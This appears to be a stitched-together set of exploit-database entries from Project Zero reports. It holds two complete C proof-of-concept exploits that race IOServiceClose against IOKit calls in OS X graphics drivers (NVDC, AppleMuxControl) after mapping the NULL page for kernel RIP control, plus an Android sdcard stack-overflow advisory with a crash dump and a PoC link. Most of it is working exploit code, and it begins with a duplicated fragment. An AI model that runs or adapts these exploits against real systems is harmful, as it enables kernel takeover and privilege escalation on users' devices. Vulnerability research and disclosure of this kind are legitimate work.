int main(int argc, char** argv){
  kern_return_t err;
  // re map the null page rw
  int var = 0;   /* unused */
  err = vm_deallocate(mach_task_self(), 0x0, 0x1000);
  if (err != KERN_SUCCESS){
    printf("%x\n", err);   /* not fatal: execution continues regardless */
  }
  vm_address_t addr = 0;
  /* flags 0 == VM_FLAGS_FIXED: allocate exactly at address 0 */
  err = vm_allocate(mach_task_self(), &addr, 0x1000, 0);
  if (err != KERN_SUCCESS){
    if (err == KERN_INVALID_ADDRESS){
      printf("invalid address\n");
    }
    if (err == KERN_NO_SPACE){
      printf("no space\n");
    }
    printf("%x\n", err);   /* also not fatal; the stores below would then fault */
  }
  char* np = 0;
  for (int i = 0; i < 0x1000; i++){
    np[i] = '\x41';
  }

  for(;;) {
    poc();
  }
  return 0;

}
            
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=782

AppleGraphicsDeviceControlClient doesn't check that its pointer to its IOService (at this+0xd8) is non-null before using it
in all external methods.

We can set this pointer to NULL by racing two threads, one of which calls IOServiceClose which NULLs out the pointer and the
other of which makes any external method call.

By mapping the NULL page in userspace this gives us trivial kernel RIP control as the code makes a virtual call on a NULL object pointer.

tested on OS X 10.11.4 (15E65) MacBookPro 10,1
*/

// ianbeer

// clang -o graphicscontrol_race graphicscontrol_race.c -framework IOKit -m32 -lpthread -pagezero_size 0x0

/*
OS X exploitable kernel NULL pointer dereference in AppleGraphicsDeviceControl

AppleGraphicsDeviceControlClient doesn't check that its pointer to its IOService (at this+0xd8) is non-null before using it
in all external methods.

We can set this pointer to NULL by racing two threads, one of which calls IOServiceClose which NULLs out the pointer and the
other of which makes any external method call.

By mapping the NULL page in userspace this gives us trivial kernel RIP control as the code makes a virtual call on a NULL object pointer.

tested on OS X 10.11.4 (15E65) MacBookPro 10,1
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#include <IOKit/IOKitLib.h>

#include <libkern/OSAtomic.h>

#include <mach/thread_act.h>

#include <pthread.h>

#include <mach/mach.h>
#include <mach/vm_map.h>
#include <sys/mman.h>
    
/* File-scope argument block for IOConnectCallMethod(); set_params() fills
 * it on the main thread, make_iokit_call() reads it on the worker.
 * Static storage, so all of it starts zeroed. */
unsigned int selector = 0;                  /* external method index */

uint64_t inputScalar[16];                   /* scalar inputs; first inputScalarCnt are sent */
size_t inputScalarCnt = 0;

uint8_t inputStruct[40960];                 /* structure input buffer and byte count */
size_t inputStructCnt = 0; 

uint64_t outputScalar[16] = {0};            /* scalar output buffer; count passed by address */
uint32_t outputScalarCnt = 0;

char outputStruct[40960] = {0};             /* structure output buffer; count passed by address */
size_t outputStructCnt = 0;

io_connect_t global_conn = MACH_PORT_NULL;  /* user client connection used by the worker */

/* Record the connection and the argument shape for make_iokit_call():
 * no inputs at all, capacity for 16 scalar / 4096 structure output bytes.
 * The selector is 0 here; per the header any external method would do,
 * since the missing NULL check is shared by all of them. Writes only the
 * file-scope globals. */
void set_params(io_connect_t conn)
{
  global_conn = conn;

  /* output capacities */
  outputScalarCnt = 16;
  outputStructCnt = 4096;

  /* no inputs */
  inputStructCnt = 0;
  inputScalarCnt = 0;

  selector = 0;   /// anything :)
}

/* Issue the external method call described by the globals above; the
 * kern_return_t result is ignored. Runs on the worker thread after the
 * lock handshake in poc(). */
void make_iokit_call(){  
  IOConnectCallMethod(
      global_conn,
      selector,
      inputScalar,
      inputScalarCnt,
      inputStruct,
      inputStructCnt,
      outputScalar,
      &outputScalarCnt,   /* capacity in; passed by address */
      outputStruct,
      &outputStructCnt);  /* capacity in; passed by address */
}

/* Start-gate: poc() holds it during setup, thread_func() spins on it and
 * hands it back after the call so poc() can be invoked repeatedly. */
OSSpinLock lock = OS_SPINLOCK_INIT;

/* Worker thread: spin until `lock` can be taken (poc() releases it right
 * after set_params()), make the IOKit call so it overlaps with the main
 * thread's IOServiceClose(), then release the lock so the next poc()
 * iteration can start. `arg` unused; returns NULL. */
void* thread_func(void* arg){
  (void)arg;

  /* non-zero from OSSpinLockTry() means the lock is ours */
  while (OSSpinLockTry(&lock) == 0) {
  }

  // usleep(1);

  make_iokit_call();
  OSSpinLockUnlock(&lock);
  return NULL;
}

/* Open user client `type` on the first IOService whose class matches
 * `name`. Returns the connection port, or 0 (MACH_PORT_NULL) after printing
 * a diagnostic if any step fails. The matching dictionary is consumed by
 * IOServiceGetMatchingServices(); the iterator and service handles are
 * never released. */
mach_port_t get_user_client(char* name, int type) {
  CFMutableDictionaryRef match = IOServiceMatching(name);
  if (match == NULL) {
    printf("unable to create service matching dictionary\n");
    return 0;
  }

  io_iterator_t it;
  kern_return_t rc = IOServiceGetMatchingServices(kIOMasterPortDefault, match, &it);
  if (rc != KERN_SUCCESS) {
    printf("no matches\n");
    return 0;
  }

  io_service_t svc = IOIteratorNext(it);   /* first match only */
  if (svc == IO_OBJECT_NULL) {
    printf("unable to find service\n");
    return 0;
  }
  printf("got service: %x\n", svc);

  io_connect_t conn = MACH_PORT_NULL;
  rc = IOServiceOpen(svc, mach_task_self(), type, &conn);
  if (rc != KERN_SUCCESS) {
    printf("unable to get user client connection\n");
    return 0;
  }
  printf("got userclient connection: %x\n", conn);

  return conn;
}

/* One race attempt: hold the lock, start the worker (which spins on it),
 * open user client type 0 on NVDC, publish the parameters, then release the
 * worker and close the connection back-to-back so the external method and
 * IOServiceClose() overlap. Joins the worker, which releases the lock
 * itself, so main() can call this in a loop. */
void poc() {
  OSSpinLockLock(&lock);

  pthread_t t;
  pthread_create(&t, NULL, thread_func, NULL);


  mach_port_t conn = get_user_client("NVDC", 0);
  
  set_params(conn);        /* conn may be 0 if get_user_client() failed */
  OSSpinLockUnlock(&lock); /* releases the worker */
  IOServiceClose(conn);
  
  pthread_join(t, NULL);
}

/* Entry point: remap virtual page 0 read/write (only possible because the
 * binary is linked with -pagezero_size 0x0, see the build line above), fill
 * it with 0x41 bytes, then call poc() forever. The trailing `return 0` is
 * unreachable. */
int main(int argc, char** argv){
  kern_return_t err;
  // re map the null page rw
  int var = 0;   /* unused */
  err = vm_deallocate(mach_task_self(), 0x0, 0x1000);
  if (err != KERN_SUCCESS){
    printf("%x\n", err);   /* not fatal: execution continues regardless */
  }
  vm_address_t addr = 0;
  /* flags 0 == VM_FLAGS_FIXED: allocate exactly at address 0 */
  err = vm_allocate(mach_task_self(), &addr, 0x1000, 0);
  if (err != KERN_SUCCESS){
    if (err == KERN_INVALID_ADDRESS){
      printf("invalid address\n");
    }
    if (err == KERN_NO_SPACE){
      printf("no space\n");
    }
    printf("%x\n", err);   /* also not fatal; the stores below would then fault */
  }
  char* np = 0;
  for (int i = 0; i < 0x1000; i++){
    np[i] = '\x41';
  }

  for (;;) {
    poc();
  }

  return 0;
}
            
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=798

Android: Stack-buffer-overflow in /system/bin/sdcard

There's an integer overflow issue in get_node_path_locked, which results in 
a buffer overflow. For all of the calling paths, this is going to overflow a 
stack buffer in the parent function:

static ssize_t get_node_path_locked(struct node* node, char* buf, size_t bufsize) {
    const char* name;
    size_t namelen;
    if (node->graft_path) {
        name = node->graft_path;
        namelen = node->graft_pathlen;
    } else if (node->actual_name) {
        name = node->actual_name;
        namelen = node->namelen;
    } else {
        name = node->name;
        namelen = node->namelen;
    }

    // This check passes when bufsize == namelen + 1 (exactly room for the
    // name and its NUL) ...
    if (bufsize < namelen + 1) {
        return -1;
    }

    ssize_t pathlen = 0;
    if (node->parent && node->graft_path == NULL) {
        // ... but then bufsize - namelen - 2 wraps to SIZE_MAX (unsigned
        // arithmetic), so the recursive call sees an effectively unbounded
        // buffer and the '/' and memcpy below write past the caller's
        // buffer. The subtraction is only meaningful when
        // bufsize >= namelen + 2 ('/' + name + NUL), which is not checked.
        pathlen = get_node_path_locked(node->parent, buf, bufsize - namelen - 2);
        if (pathlen < 0) {
            return -1;
        }
        buf[pathlen++] = '/';
    }

    memcpy(buf + pathlen, name, namelen + 1); /* include trailing \0 */
    return pathlen + namelen;
}

This can be triggered by a malicious app creating a directory structure in
/sdcard with a total path length longer than PATH_MAX, which can be achieved by
creating a directory hierarchy starting with several directories with short 
names and later renaming these parent directories to have longer names. See the
attached POC, which can be run from the 'untrusted_app' selinux domain.

It appears that the overflow is close enough to the bottom of the stack that 
with a large overflow we can corrupt thread data that is used before the stack 
cookie is checked, suggesting that this issue is possibly exploitable despite 
the presence of stack cookies.

(gdb) i r
r0             0xb	11
r1             0x1	1
r2             0x41414199	1094795673
r3             0x41414141	1094795585
r4             0x80000000	2147483648
r5             0x0	0
r6             0xb6e40ec0	3068399296
r7             0xb6cbe860	3066816608
r8             0xb6e4930c	3068433164
r9             0xb6e3c594	3068380564
r10            0xbee4c9ac	3202664876
r11            0xb6943180	3063165312
r12            0xb6e3c908	3068381448
sp             0xb6cbe7a0	0xb6cbe7a0
lr             0xb6e1daad	-1226712403
pc             0xb6e06ade	0xb6e06ade <pthread_getspecific(pthread_key_t)+34>
cpsr           0x80070030	-2147024848
(gdb) x/10i $pc
=> 0xb6e06ade <pthread_getspecific(pthread_key_t)+34>:	ldr	r4, [r2, #100]	; 0x64
   0xb6e06ae0 <pthread_getspecific(pthread_key_t)+36>:	cmp	r4, r1
   0xb6e06ae2 <pthread_getspecific(pthread_key_t)+38>:	bne.n	0xb6e06aec <pthread_getspecific(pthread_key_t)+48>
   0xb6e06ae4 <pthread_getspecific(pthread_key_t)+40>:	ldr	r0, [r2, #104]	; 0x68
   0xb6e06ae6 <pthread_getspecific(pthread_key_t)+42>:	pop	{r4, pc}
   0xb6e06ae8 <pthread_getspecific(pthread_key_t)+44>:	movs	r0, #0
   0xb6e06aea <pthread_getspecific(pthread_key_t)+46>:	pop	{r4, pc}
   0xb6e06aec <pthread_getspecific(pthread_key_t)+48>:	adds	r0, #12
   0xb6e06aee <pthread_getspecific(pthread_key_t)+50>:	add.w	r12, r3, r0, lsl #3
   0xb6e06af2 <pthread_getspecific(pthread_key_t)+54>:	movs	r0, #0
(gdb) bt
#0  0xb6e06ade in pthread_getspecific (key=11) at bionic/libc/bionic/pthread_key.cpp:160
#1  0xb6e1daac in je_tsd_wrapper_get () at external/jemalloc/include/jemalloc/internal/tsd.h:609
#2  je_tsd_get () at external/jemalloc/include/jemalloc/internal/tsd.h:609
#3  je_tsd_fetch () at external/jemalloc/include/jemalloc/internal/tsd.h:614
#4  imalloc_body (usize=<synthetic pointer>, tsd=<synthetic pointer>, size=4) at external/jemalloc/src/jemalloc.c:1401
#5  je_malloc (size=4) at external/jemalloc/src/jemalloc.c:1423
#6  0xb6f3bb3e in handle_open (fuse=0xbee478c8, hdr=0xbee4c984, req=<optimized out>, handler=<optimized out>)
    at system/core/sdcard/sdcard.c:1193
#7  0x41414140 in ?? ()


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39921.zip
            
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=783

The method AppleGraphicsControlClient::checkArguments does actually appear to test whether the pointer at this+0xd8 is non-null, but uses it anyway :)

We can race external methods which call this with another thread calling IOServiceClose to get a NULL pointer there.

By mapping the NULL page in userspace this gives us trivial kernel RIP control as the code makes a virtual call on a NULL object pointer.

tested on OS X 10.11.4 (15E65) MacBookPro 10,1
*/

// ianbeer

// clang -o mux_control_race mux_control_race.c -framework IOKit -m32 -lpthread -pagezero_size 0x0

/*
OS X exploitable kernel NULL pointer dereference in AppleMuxControl.kext

The method AppleGraphicsControlClient::checkArguments does actually appear to test whether the pointer at this+0xd8 is non-null, but uses it anyway :)

We can race external methods which call this with another thread calling IOServiceClose to get a NULL pointer there.

By mapping the NULL page in userspace this gives us trivial kernel RIP control as the code makes a virtual call on a NULL object pointer.

tested on OS X 10.11.4 (15E65) MacBookPro 10,1
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#include <IOKit/IOKitLib.h>

#include <libkern/OSAtomic.h>

#include <mach/thread_act.h>

#include <pthread.h>

#include <mach/mach.h>
#include <mach/vm_map.h>
#include <sys/mman.h>
    
/* File-scope argument block for IOConnectCallMethod(); set_params() fills
 * it on the main thread, make_iokit_call() reads it on the worker.
 * Static storage, so all of it starts zeroed. */
unsigned int selector = 0;                  /* external method index */

uint64_t inputScalar[16];                   /* scalar inputs; first inputScalarCnt are sent */
size_t inputScalarCnt = 0;

uint8_t inputStruct[40960];                 /* structure input buffer and byte count */
size_t inputStructCnt = 0; 

uint64_t outputScalar[16] = {0};            /* scalar output buffer; count passed by address */
uint32_t outputScalarCnt = 0;

char outputStruct[40960] = {0};             /* structure output buffer; count passed by address */
size_t outputStructCnt = 0;

io_connect_t global_conn = MACH_PORT_NULL;  /* user client connection used by the worker */

/* Record the connection and the argument shape for make_iokit_call():
 * method 9 (getAGCData per the original comment), no inputs, capacity for
 * 16 scalar / 4096 structure output bytes. Writes only the file-scope
 * globals. */
void set_params(io_connect_t conn)
{
  selector = 9; // getAGCData

  /* no inputs */
  inputScalarCnt = 0;
  inputStructCnt = 0;

  /* output capacities */
  outputStructCnt = 4096;
  outputScalarCnt = 16;

  global_conn = conn;
}

/* Issue the external method call described by the globals above; the
 * kern_return_t result is ignored. Runs on the worker thread after the
 * lock handshake in poc(). */
void make_iokit_call(){  
  IOConnectCallMethod(
      global_conn,
      selector,
      inputScalar,
      inputScalarCnt,
      inputStruct,
      inputStructCnt,
      outputScalar,
      &outputScalarCnt,   /* capacity in; passed by address */
      outputStruct,
      &outputStructCnt);  /* capacity in; passed by address */
}

/* Start-gate: poc() holds it during setup, thread_func() spins on it and
 * hands it back after the call so poc() can be invoked repeatedly. */
OSSpinLock lock = OS_SPINLOCK_INIT;

/* Worker thread: spin until `lock` can be taken (poc() releases it right
 * after set_params()), make the IOKit call so it overlaps with the main
 * thread's IOServiceClose(), then give the lock back so the next poc()
 * iteration can start. `arg` unused; returns NULL. */
void* thread_func(void* arg){
  (void)arg;

  /* non-zero from OSSpinLockTry() means the lock is ours */
  while (OSSpinLockTry(&lock) == 0) {
  }

  // usleep(1);

  make_iokit_call();
  OSSpinLockUnlock(&lock);
  return NULL;
}

/* Open user client `type` on the first IOService whose class matches
 * `name`. Returns the connection port, or 0 (MACH_PORT_NULL) after printing
 * a diagnostic if any step fails. The matching dictionary is consumed by
 * IOServiceGetMatchingServices(); the iterator and service handles are
 * never released. */
mach_port_t get_user_client(char* name, int type) {
  CFMutableDictionaryRef dict = IOServiceMatching(name);
  if (dict == NULL) {
    printf("unable to create service matching dictionary\n");
    return 0;
  }

  io_iterator_t iter;
  kern_return_t kr = IOServiceGetMatchingServices(kIOMasterPortDefault, dict, &iter);
  if (kr != KERN_SUCCESS) {
    printf("no matches\n");
    return 0;
  }

  /* first match only */
  io_service_t svc = IOIteratorNext(iter);
  if (svc == IO_OBJECT_NULL) {
    printf("unable to find service\n");
    return 0;
  }
  printf("got service: %x\n", svc);

  io_connect_t conn = MACH_PORT_NULL;
  kr = IOServiceOpen(svc, mach_task_self(), type, &conn);
  if (kr != KERN_SUCCESS) {
    printf("unable to get user client connection\n");
    return 0;
  }
  printf("got userclient connection: %x\n", conn);

  return conn;
}

/* One race attempt: hold the lock, start the worker (which spins on it),
 * open user client type 0 on AppleMuxControl, publish the parameters, then
 * release the worker and close the connection back-to-back so the external
 * method and IOServiceClose() overlap. Joins the worker, which releases the
 * lock itself, so main() can call this in a loop. */
void poc() {
  OSSpinLockLock(&lock);

  pthread_t t;
  pthread_create(&t, NULL, thread_func, NULL);


  mach_port_t conn = get_user_client("AppleMuxControl", 0);
  
  set_params(conn);        /* conn may be 0 if get_user_client() failed */
  OSSpinLockUnlock(&lock); /* releases the worker */
  IOServiceClose(conn);
  
  pthread_join(t, NULL);
}

/* Entry point: remap virtual page 0 read/write (only possible because the
 * binary is linked with -pagezero_size 0x0, see the build line above), fill
 * it with 0x41 bytes, then call poc() forever. The trailing `return 0` is
 * unreachable. */
int main(int argc, char** argv){
  kern_return_t err;
  // re map the null page rw
  int var = 0;   /* unused */
  err = vm_deallocate(mach_task_self(), 0x0, 0x1000);
  if (err != KERN_SUCCESS){
    printf("%x\n", err);   /* not fatal: execution continues regardless */
  }
  vm_address_t addr = 0;
  /* flags 0 == VM_FLAGS_FIXED: allocate exactly at address 0 */
  err = vm_allocate(mach_task_self(), &addr, 0x1000, 0);
  if (err != KERN_SUCCESS){
    if (err == KERN_INVALID_ADDRESS){
      printf("invalid address\n");
    }
    if (err == KERN_NO_SPACE){
      printf("no space\n");
    }
    printf("%x\n", err);   /* also not fatal; the stores below would then fault */
  }
  char* np = 0;
  for (int i = 0; i < 0x1000; i++){
    np[i] = '\x41';
  }

  for (;;) {
    poc();
  }

  return 0;
}